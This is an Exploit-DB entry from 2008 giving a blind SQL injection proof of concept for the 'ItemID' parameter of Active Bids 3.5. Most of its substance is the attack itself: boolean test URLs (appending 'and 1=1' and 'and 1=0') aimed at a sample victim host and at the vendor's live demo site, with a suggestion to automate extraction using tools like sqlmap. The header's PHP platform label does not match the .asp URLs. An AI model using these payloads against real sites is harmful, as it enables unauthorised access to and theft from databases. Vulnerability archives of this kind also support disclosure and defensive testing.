Active Bids 3.5 - 'itemID' Blind SQL Injection

EDB-ID:

7290


Author:

Stack

Type:

webapps


Platform:

PHP

Date:

2008-11-29


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

 [~]Tybe     : Remote Blind SQL Injection Vulnerability
   
 [~]Vendor   : www.activewebsoftwares.com
   
 [~]Software : Active Bids
   
 [~]author   : Mountassif Moad



http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1

http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0

Demo :

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0


# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...

# milw0rm.com [2008-11-29]